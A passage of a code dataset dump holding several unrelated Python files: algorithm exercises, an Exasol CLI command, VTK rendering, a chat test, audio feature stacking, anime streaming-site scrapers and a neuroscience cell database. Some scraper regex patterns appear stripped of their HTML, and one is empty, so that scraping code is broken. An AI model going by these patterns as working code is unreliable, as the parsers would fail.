위치\n\n if board[pos] == 0: # 조건2: 방문하지 않았다면\n board[pos] = board[a] + 1\n queue.append(pos)\n\n return board[100]\n\nprint(bfs(1))\n","sub_path":"w3.BFS/BOJ_16928(뱀과 사다리 게임)/16928_정원.py","file_name":"16928_정원.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"79777247","text":"import textwrap\nfrom pathlib import Path\n\nimport click\nfrom exasol_integration_test_docker_environment.cli.cli import cli\nfrom exasol_integration_test_docker_environment.cli.common import add_options\n\nfrom exaslct_src.exaslct.cli.options.flavor_options import single_flavor_options\nfrom exaslct_src.exaslct.lib.tasks.upload.language_definition import LanguageDefinition\n\n\n@cli.command()\n@add_options(single_flavor_options)\n@click.option('--bucketfs-name', type=str, required=True)\n@click.option('--bucket-name', type=str, required=True)\n@click.option('--path-in-bucket', type=str, required=False, default=\"\")\n@click.option('--container-name', type=str, required=True)\ndef generate_language_activation(\n flavor_path: str,\n bucketfs_name: str,\n bucket_name: str,\n path_in_bucket: str,\n container_name: str):\n \"\"\"\n Generate the language activation statement\n \"\"\"\n\n language_definition = \\\n LanguageDefinition(release_name=container_name,\n flavor_path=flavor_path,\n bucketfs_name=bucketfs_name,\n bucket_name=bucket_name,\n path_in_bucket=path_in_bucket)\n\n command_line_output_str = textwrap.dedent(f\"\"\"\n\n In SQL, you can activate the languages supported by the {Path(flavor_path).name}\n flavor by using the following statements:\n\n\n To activate the flavor only for the current session:\n\n {language_definition.generate_alter_session()}\n\n\n To activate the flavor on the system:\n\n {language_definition.generate_alter_system()}\n \"\"\")\n print(command_line_output_str)\n","sub_path":"exaslct_src/exaslct/cli/commands/generate_language_activation.py","file_name":"generate_language_activation.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"629722281","text":"# Code Eval - Longes Lines\n# https://www.codeeval.com/open_challenges/2/\n\nimport sys\n\ntest_cases = open(sys.argv[1], 'r')\ntest_cases1 = []\nfor test in test_cases:\n test_cases1.append(test)\n\ntest_cases1.append(\"1\") # chusco D:\nFirst = True\nfor test in test_cases1:\n test = test.strip()\n if First:\n times = int(test)\n lines = []\n finished = \"\"\n First = False\n continue\n if test.isdigit():\n count = 0\n while count != times:\n longest = \"\"\n for line in lines:\n if len(line) > len(longest):\n longest = line\n print(longest)\n lines.remove(longest)\n count = count + 1\n lines = []\n finished = \"\"\n times = int(test)\n continue\n lines.append(test)\n","sub_path":"CodeEval/python/moderate/longest-lines/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"243696201","text":"# Volume rendering of Liver data\r\n\r\nfrom vtk import *\r\n\r\nreader = vtkStructuredPointsReader()\r\nreader.SetFileName(\"Liver.vtk\")\r\n\r\n\r\n# Color\r\ncolorTransferFunction = vtkColorTransferFunction()\r\ncolorTransferFunction.AddRGBPoint(0.0, 0.0, 0.0, 0.0)\r\ncolorTransferFunction.AddRGBPoint(20.0, 1.0, 0.0, 0.0)\r\ncolorTransferFunction.AddRGBPoint(120.0, 1.0, 1.0, 0.0)\r\ncolorTransferFunction.AddRGBPoint(180.0, 1.0, 1.0, 1.0)\r\ncolorTransferFunction.AddRGBPoint(255.0, 0.0, 1.0, 1.0)\r\n\r\nvolumeProperty = vtkVolumeProperty()\r\nvolumeProperty.SetColor(colorTransferFunction)\r\n\r\nvolumeProperty.ShadeOn()\r\nvolumeProperty.SetInterpolationTypeToLinear()\r\n\r\nisoFunction = vtkVolumeRayCastIsosurfaceFunction()\r\nisoFunction.SetIsoValue(160.0)\r\n\r\nvolumeMapper = vtkVolumeRayCastMapper()\r\nvolumeMapper.SetVolumeRayCastFunction( isoFunction )\r\nvolumeMapper.SetInputConnection(reader.GetOutputPort())\r\n\r\nvolume = vtkVolume()\r\nvolume.SetMapper(volumeMapper)\r\nvolume.SetProperty(volumeProperty)\r\n\r\n\r\n# Bounding box.\r\noutlineData = vtkOutlineFilter()\r\noutlineData.SetInputConnection(reader.GetOutputPort())\r\noutlineMapper = vtkPolyDataMapper()\r\noutlineMapper.SetInputConnection(outlineData.GetOutputPort())\r\noutline = vtkActor()\r\noutline.SetMapper(outlineMapper)\r\noutline.GetProperty().SetColor(0.9, 0.9, 0.9)\r\n\r\n# Set a better camera position\r\ncamera = vtkCamera()\r\ncamera.SetViewUp(0, 0, -1)\r\ncamera.SetPosition(-2, -2, -2)\r\n\r\n# Create the Renderer, Window and Interator\r\nren = vtkRenderer()\r\nren.AddActor(outline)\r\nren.AddVolume(volume)\r\nren.SetBackground(0.1, 0.1, 0.2)\r\nren.SetActiveCamera(camera)\r\nren.ResetCamera()\r\n\r\nrender_window = vtkRenderWindow()\r\nrender_window.AddRenderer(ren)\r\nrender_window.SetWindowName(\"Volume rendering of Liver data\");\r\nrender_window.SetSize(500, 500)\r\n\r\niren = vtkRenderWindowInteractor()\r\niren.SetRenderWindow(render_window)\r\n\r\niren.Initialize()\r\nrender_window.Render()\r\niren.Start()\r\n","sub_path":"exercises/Volume/VolumeIso.py","file_name":"VolumeIso.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"635925225","text":"from multiprocessing import Process\nimport pytest\nfrom hypothesis import given, strategy\n\n\n@pytest.fixture(scope='session')\ndef wschat(request):\n def run_wschat():\n from examples.wschat import app\n app.run(port=3002)\n proc = Process(target=run_wschat)\n proc.start()\n request.addfinalizer(proc.terminate)\n\n\nnon_empty_str = strategy(str).filter(bool)\n\n\n@pytest.mark.slow\n@given(uname=non_empty_str, msg=non_empty_str)\ndef test_wschat(browser, wschat, uname, msg):\n browser.visit('http://localhost:3002')\n browser.find_by_id('login-input').type(uname + '\\r')\n browser.find_by_id('chat-input').type(msg + '\\r')\n line1, line2 = browser.find_by_css('.chat-window')[0].text.splitlines()\n assert line1 == \"User '{}' entered chat\".format(uname)\n assert line2.endswith(' {}: {}'.format(uname, msg))\n","sub_path":"tests/test_wschat.py","file_name":"test_wschat.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"98733576","text":"\"\"\"python stack_fbanks.py npz7_train/*.npy\n\"\"\"\n\nimport sys\nimport numpy as np\n\nNFRAMES = 7\nb_a = (NFRAMES - 1) / 2\nFRAMES_PER_SEC = 100 # features frames per second\nFEATURES_RATE = 1. / FRAMES_PER_SEC\n\n\ndef h5features_stack_fbanks(fbanks_file, stacked_fbanks_file):\n import h5features\n index = h5features.read_index(fbanks_file)\n files = index['files']\n for f in files:\n times, fbanks = h5features.read(\n fbanks_file, 'features', from_internal_file=f, index=index)\n stacked_fbanks = stack_fbanks(fbanks[f])\n h5features.write(stacked_fbanks_file, 'features', [f],\n [times[f]], [stacked_fbanks])\n\n\ndef stack_fbanks(fbanks, nframes=7):\n fbanks_s = np.zeros((fbanks.shape[0], fbanks.shape[1] * nframes),\n dtype='float32')\n for i in xrange(b_a + 1):\n fbanks_s[i] = np.pad(fbanks[max(0, i - b_a):i + b_a + 1].flatten(),\n (max(0, (b_a - i) * fbanks.shape[1]),\n max(0, ((i+b_a+1) - fbanks.shape[0]) * fbanks.shape[1])),\n 'constant', constant_values=(0, 0))\n for i in xrange(b_a + 1, fbanks.shape[0] - b_a):\n fbanks_s[i] = fbanks[i - b_a:i + b_a + 1].flatten()\n for i in xrange(fbanks.shape[0] - b_a - 1, fbanks.shape[0]):\n fbanks_s[i] = np.pad(fbanks[max(0, i - b_a):i + b_a + 1].flatten(),\n (max(0, (b_a - i) * fbanks.shape[1]),\n max(0, ((i+b_a+1) - fbanks.shape[0]) * fbanks.shape[1])),\n 'constant', constant_values=(0, 0))\n return fbanks_s\n\n\nif __name__ == '__main__':\n for fname in sys.argv[1:]:\n fbanks = np.load(fname)\n fbanks_s = stack_fbanks(fbanks)\n time_table = np.zeros(fbanks_s.shape[0])\n for i in xrange(time_table.shape[0]):\n time_table[i] = float(i) / FRAMES_PER_SEC + FEATURES_RATE / 2\n np.savez(fname.split('.')[0] + '.npz',\n features=fbanks_s,\n time=time_table)\n","sub_path":"abnet/utils/stack_fbanks.py","file_name":"stack_fbanks.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"551568382","text":"import sys\nsys.path.append(\"site-packages\")\nimport requests\nimport json\nimport re\nfrom abc import ABCMeta, abstractmethod\nimport string\nfrom unidecode import unidecode\nfrom urllib import parse\nfrom datetime import datetime\nimport xml.etree.ElementTree as ET\n\ntranstable = {ord(c): None for c in string.punctuation}\ndef compare(first, second):\n\treturn unidecode(first.lower()).translate(transtable).replace(' ', ' ') == second\n\nclass AnimeSource:\n\t__metaclass__ = ABCMeta\n\t\n\tdef __init__(self, titleMap, multiSeason, region, proxy):\n\t\tself.name = \"\"\n\t\tself.shows = []\n\t\tself.titleMap = titleMap\n\t\tself.multiSeason = multiSeason\n\t\tself.region = region\n\t\tself.proxy = proxy\n\t\n\t@abstractmethod\n\tdef UpdateShowList(self, showList):\n\t\tpass\n\t\t\n\t@abstractmethod\n\tdef GetData(self):\n\t\tpass\n\n\tdef GetName(self):\n\t\treturn self.name \n\t\t\n\tdef AddShow(self, showName, showUrl, showList):\n\t\tshowNames = [showName]\n\t\tif (showName in self.titleMap):\n\t\t\tshowNames[0] = self.titleMap[showName]\n\t\tif (self.name in self.titleMap):\n\t\t\tif (showNames[0] in self.titleMap[self.name]):\n\t\t\t\tif (self.titleMap[self.name][showNames[0]] == \"\"):\n\t\t\t\t\treturn\n\t\t\t\tshowNames[0] = self.titleMap[self.name][showNames[0]]\n\t\tif (self.name in self.multiSeason):\n\t\t\tif (showNames[0] in self.multiSeason[self.name]):\n\t\t\t\tshowNames = showNames + self.multiSeason[self.name][showNames[0]]\n\t\tfor name in showNames:\n\t\t\ttranslated_name = unidecode(name.lower()).translate(transtable).replace(' ', ' ')\n\t\t\tif (translated_name in showList):\n\t\t\t\tshowList[translated_name]['sites'][self.name] = showUrl\n\t\t\telse:\n\t\t\t\tshow_obj = {'name': name, 'sites': {self.name: showUrl}}\n\t\t\t\tshowList[translated_name] = show_obj\n\t\t\nclass Crunchyroll(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"crunchyroll\"\n\t\t\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[0].strip())\n\t\t\tshowUrl = \"http://www.crunchyroll.com\" + show[1]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\twith open('credentials.json') as creds_file:\n\t\t\tcredentials = json.load(creds_file)\n\t\tcrSession = requests.Session()\n\t\tparams = {\n\t\t\t\"formname\": \"RpcApiUser_Login\",\n\t\t\t\"failurl\": \"http://www.crunchyroll.com/login\",\n\t\t\t\"name\": credentials['crunchyroll']['username'], \n\t\t\t\"password\": credentials['crunchyroll']['password']\n\t\t}\n\t\tcrSession.post('https://www.crunchyroll.com/?a=formhandler', params=params, proxies = self.proxy)\n\t\tblob = crSession.get('http://www.crunchyroll.com/videos/anime/alpha?group=all', proxies = self.proxy)\n\t\tregex = '([^\\\"]*)'\n\t\treturn re.findall(regex, blob.text)\n\t\t\nclass Funimation(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"funimation\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['title'].strip())\n\t\t\tshowUrl = 'http://www.funimation.com/shows/' + show['id']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tblob = requests.get('https://api-funimation.dadcdigital.com/xml/longlist/content/page/?id=shows&sort=&title=All+Shows&sort_direction=DESC&role=g&itemThemes=dateAddedShow&limit=500&offset=0&territory=' + self.region, proxies = self.proxy)\n\t\tlist = ET.fromstring(blob.text)\n\t\tfor show in list.iterfind('item'):\n\t\t\tresults.append({'title': show.find('title').text, 'id': show.find('id').text})\n\t\treturn results\n\t\t\nclass Hulu(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"hulu\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['show']['name'].strip())\n\t\t\tshowUrl = 'http://www.hulu.com/' + show['show']['canonical_name']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\toauth_blob = requests.get('http://www.hulu.com/lets-get-a-404')\n\t\toauth_regex = \"w.API_DONUT = '([^']*)';\"\n\t\toauth_key = re.findall(oauth_regex, oauth_blob.text)[0]\n\t\tmovies_blob = requests.get('http://www.hulu.com/mozart/v1.h2o/movies?exclude_hulu_content=1&genre=anime&sort=release_with_popularity&_language=en&_region=us&items_per_page=1000&position=0®ion=us&locale=en&language=en&access_token=' + oauth_key)\n\t\tanime_blob = requests.get('http://www.hulu.com/mozart/v1.h2o/shows?exclude_hulu_content=1&genre=anime&sort=release_with_popularity&_language=en&_region=us&items_per_page=1000&position=0®ion=us&locale=en&language=en&access_token=' + oauth_key)\n\t\tanime_blob_2 = requests.get('http://www.hulu.com/mozart/v1.h2o/shows?exclude_hulu_content=1&genre=anime&sort=release_with_popularity&_language=en&_region=us&items_per_page=1000&position=500®ion=us&locale=en&language=en&access_token=' + oauth_key)\n\t\tanimation_blob = requests.get('http://www.hulu.com/mozart/v1.h2o/shows?exclude_hulu_content=1&genre=animation&sort=release_with_popularity&_language=en&_region=us&items_per_page=1000&position=0®ion=us&locale=en&language=en&access_token=' + oauth_key)\n\t\tanimation_list = json.loads(animation_blob.text)['data']\n\t\tanimation_list = [x for x in animation_list if x['show']['genre'] == \"Anime\"]\n\t\tanime_list = json.loads(anime_blob.text)['data'] + json.loads(anime_blob_2.text)['data'] + json.loads(movies_blob.text)['data']\n\t\treturn anime_list + animation_list\n\t\t\nclass Netflix(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"netflix\"\n\t\tself.countryCodes = {\n\t\t\t'us': '78',\n\t\t\t'uk': '46',\n\t\t\t'ca': '33',\n\t\t\t'au': '23'\n\t\t}\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[1].strip())\n\t\t\tshowUrl = \"http://www.netflix.com/title/\" + show[0]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\twith open('credentials.json') as creds_file:\n\t\t\tcredentials = json.load(creds_file)\n\t\theaders = {\n\t\t\t\"X-Mashape-Key\": credentials['mashape'],\n\t\t\t\"Accept\": \"application/json\"\n\t\t}\n\t\tdataBlob = requests.get(\"https://unogs-unogs-v1.p.mashape.com/api.cgi?q=-!1900,3000-!0,5-!0,10-!10695%2C11146%2C2653%2C2729%2C3063%2C413820%2C452%2C6721%2C7424%2C9302-!Any-!Any-!Any-!gt0&t=ns&st=adv&ob=Relevance&p=1&sa=and&cl=\" + self.countryCodes[self.region], headers = headers)\n\t\treturn json.loads(dataBlob.text)[\"ITEMS\"]\n\t\t\n\t\t\nclass Daisuki(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"daisuki\"\n\t\tself.countryCodes = {\n\t\t\t'us': 'us',\n\t\t\t'uk': 'gb',\n\t\t\t'ca': 'ca',\n\t\t\t'au': 'au'\n\t\t}\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\ttranstable = {ord(c): None for c in string.punctuation}\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['title'].strip())\n\t\t\tshowUrl = \"http://www.daisuki.net/anime/detail/\" + show['ad_id']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tblob = requests.get('http://www.daisuki.net/bin/wcm/searchAnimeAPI?api=anime_list&searchOptions=¤tPath=%2Fcontent%2Fdaisuki%2F' + self.countryCodes[self.region] + '%2Fen', proxies = self.proxy)\n\t\treturn blob.json()['response']\n\t\t\nclass Viewster(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"viewster\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['Title'].strip())\n\t\t\tshowUrl = \"https://www.viewster.com/serie/\" + show['OriginId']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tapi_blob = requests.get('https://www.viewster.com/', proxies = self.proxy)\n\t\tapi_token = api_blob.cookies['api_token']\n\t\theaders = {'Auth-token': parse.unquote(api_token)}\n\t\tanime_blob = requests.get('https://public-api.viewster.com/series?pageSize=100&pageIndex=1&genreId=58', headers = headers, proxies = self.proxy)\n\t\tanime_blob2 = requests.get('https://public-api.viewster.com/series?pageSize=100&pageIndex=2&genreId=58', headers = headers, proxies = self.proxy)\n\t\tsimul_blob = requests.get('https://public-api.viewster.com/series?pageSize=100&pageIndex=1&genreId=67', headers = headers, proxies = self.proxy)\n\t\ttry: \n\t\t\tsimul_items = json.loads(simul_blob.text)['Items']\n\t\t\treturn json.loads(anime_blob.text)['Items'] + json.loads(anime_blob2.text)['Items'] + simul_items\n\t\texcept:\n\t\t\treturn json.loads(anime_blob.text)['Items'] + json.loads(anime_blob2.text)['Items']\n\t\t\nclass AnimeLab(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"animelab\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['name'].strip())\n\t\t\tshowUrl = \"https://www.animelab.com/shows/\" + show['slug']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tfor curIndex in range(0, 5):\n\t\t\tblob = requests.get('https://www.animelab.com/api/shows/all?limit=100&page=' + str(curIndex), proxies = self.proxy)\n\t\t\tresults += json.loads(blob.text)['list']\n\t\treturn results\n\t\t\nclass Animax(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"animax\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\t#print(show)\n\t\t\tshowName = unidecode(show[1].strip())\n\t\t\tshowUrl = \"https://www.animaxtv.co.uk/\" + show[0]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tblob = requests.get('http://www.animaxtv.co.uk/programs', proxies = self.proxy)\n\t\tregex1 = '(.*)'\n\t\tregex2 = ''\n\t\tdata1 = re.findall(regex1, blob.text)[0]\n\t\treturn re.findall(regex2, data1)\n\t\t\nclass Hanabee(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"hanabee\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tfor show in self.shows:\n\t\t\t#print(show)\n\t\t\tshowName = unidecode(show[1].strip())\n\t\t\tshowUrl = \"http://hanabee.tv\" + show[0]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tfor curIndex in range(0, 5):\n\t\t\tblob = requests.get('http://hanabee.tv/shows/?vod-filter-button=on&start=' + str(curIndex * 10) , proxies = self.proxy)\n\t\t\tregex = '

([^\\\"]*)

'\n\t\t\tresults += re.findall(regex, blob.text)\n\t\treturn results\n\t\t\nclass AnimeNetwork(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"animenetwork\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[0].strip().replace(''', '\\''))\n\t\t\tshowUrl = \"http://www.theanimenetwork.com\" + show[1]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tpages = ['0'] + list(string.ascii_uppercase)\n\t\tfor letter in pages:\n\t\t\tblob = requests.get('http://www.theanimenetwork.com/Watch-Anime/Alphabet/' + letter, proxies = self.proxy)\n\t\t\tregex = '

([^\\\"]*)

[\\n\\s]*'\n\t\t\tprint(letter)\n\t\t\tresults += re.findall(regex, blob.text, re.M)\n\t\treturn results\n\nclass TubiTV(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"tubitv\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = self.shows[show]['title']\n\t\t\tshowTypes = {'v': 'video', 's': 'series'}\n\t\t\tshowUrl = 'http://tubitv.com/' + showTypes[self.shows[show]['type']] + '/' + str(int(show))\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tblob = requests.get('http://tubitv.com/oz/containers/anime/content?cursor=0&limit=1000', proxies = self.proxy)\n\t\treturn json.loads(blob.text)['contents']\n\nclass AnimeStrike(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"animestrike\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[0].strip())\n\t\t\tshowUrl = show[1]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tfor curIndex in range(1, 15):\n\t\t\theaders = {\n\t\t\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'\n\t\t\t}\n\t\t\tblob = requests.get('https://www.amazon.com/s/ref=sr_ex_n_1?rh=n%3A2858778011%2Cp_n_subscription_id%3Asaikindo&bbn=2858778011&ie=UTF8&qid=1512620557&page=' + str(curIndex) , headers = headers, proxies = self.proxy)\n\t\t\tregex = '[\\n\\s]*'\n\t\tresults += re.findall(regex_tv, blob_tv.text, re.M)\n\t\tblob_movies = requests.get('https://www.hidive.com/movies', proxies = self.proxy)\n\t\tregex_movies = '
[\\n\\s]*'\n\t\tresults += re.findall(regex_movies, blob_movies.text, re.M)\n\t\treturn results\n\nclass YahooView(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"yahoo\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['title'].strip().replace(''', '\\''))\n\t\t\tshowUrl = \"https://view.yahoo.com/show/\" + show['id']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tblob = requests.get('https://view.yahoo.com/browse/tv/genre/anime/shows', proxies = self.proxy)\n\t\tregex = '\\\"seriesListItems\\\":(.*)},\\\"StreamStore\\\"'\n\t\tresultsJson = re.findall(regex, blob.text)[0]\n\t\tresults = json.loads(resultsJson)\n\t\treturn results\n\nclass AmazonPrime(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"amazon\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[0].strip())\n\t\t\tshowUrl = show[1]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\turls = {\n\t\t\t'us': 'https://www.amazon.com/s/gp/search/ref=sr_nr_p_n_entity_type_1?fst=as%3Aoff&rh=n%3A2858778011%2Cp_n_theme_browse-bin%3A2650364011%2Cp_85%3A2470955011%2Cp_n_entity_type%3A14069184011%7C14069185011&bbn=2858778011&ie=UTF8&qid=1515170443&rnid=14069183011&page=',\n\t\t\t'uk': 'https://www.amazon.co.uk/s/gp/search/ref=sr_nr_p_n_entity_type_1?fst=as%3Aoff&rh=n%3A3280626031%2Cp_n_theme_browse-bin%3A3046743031%2Cp_n_ways_to_watch%3A7448660031%2Cp_n_entity_type%3A9739952031%7C9739955031&bbn=3280626031&ie=UTF8&qid=1515297590&rnid=9739949031&page='\n\t\t}\n\t\tresults = []\n\t\tfor curIndex in range(1, 15):\n\t\t\theaders = {\n\t\t\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'\n\t\t\t}\n\t\t\tblob = requests.get(urls[self.region] + str(curIndex) , headers = headers, proxies = self.proxy)\n\t\t\tregex = '> cellDB.findcell('test000','20001201a',1,11)\n >> cellDB.findcell(onecell)\n '''\n if isinstance(firstParam,str):\n onecell = CellInfo(firstParam,'',behavSession,tetrode,cluster)\n else:\n onecell = firstParam\n cellIndex = None\n for ind,cell in enumerate(self):\n if onecell.animalName==cell.animalName:\n if onecell.behavSession==cell.behavSession:\n if onecell.tetrode==cell.tetrode:\n if onecell.cluster==cell.cluster:\n cellIndex = ind\n return cellIndex\n def set_soundResponsive(self,zScores,threshold=3):\n '''\n Set soundResponsive flag for each cell, given zScores\n zScores: numpy array (nTimeBins,nConditions,nCells)\n threshold: above this or below negative this it is considered responsive\n '''\n for indcell,onecell in enumerate(self):\n onecell.soundResponsive = np.any(abs(zScores[:,:,indcell])>threshold)\n def get_vector(self,varname):\n '''\n EXAMPLE: cellDB.get_vector('tetrode')\n '''\n return np.array([getattr(onecell, varname) for onecell in self])\n def subset(self,indexes):\n subsetDB = CellDatabase()\n if isinstance(indexes,np.ndarray) and indexes.dtype==bool:\n indexes = np.flatnonzero(indexes)\n for ind in indexes:\n subsetDB.append(self[ind])\n return subsetDB\n def __str__(self):\n objStrings = []\n for ind,c in enumerate(self):\n objStrings.append('[%d] %s\\n'%(ind,c))\n return ''.join(objStrings)\n def save_locked_spikes(self,outputDir,timeRange=np.array([-0.3,0.9]),lockTo=1):\n sessionanalysis.save_data_each_cell(self,outputDir,timeRange=timeRange,lockTo=lockTo)\n def evaluate_response(self):\n # NOTE IMPLEMENTED\n pass\n\n\nclass MultiUnitDatabase(list):\n '''Container of set of multiunit sites.\n '''\n def __init__(self):\n super(MultiUnitDatabase, self).__init__()\n def __str__(self):\n objStrings = []\n for ind,c in enumerate(self):\n objStrings.append('[%d] %s\\n'%(ind,c))\n return ''.join(objStrings)\n def save_locked_spikes(self,outputDir,timeRange=np.array([-0.3,0.9]),lockTo=1):\n sessionanalysis.save_data_each_mu(self,outputDir,timeRange=timeRange,lockTo=1)\n\n\n# ----------------------- THE NEW (2016) VERSION ------------------------\n\n'''\nDesign 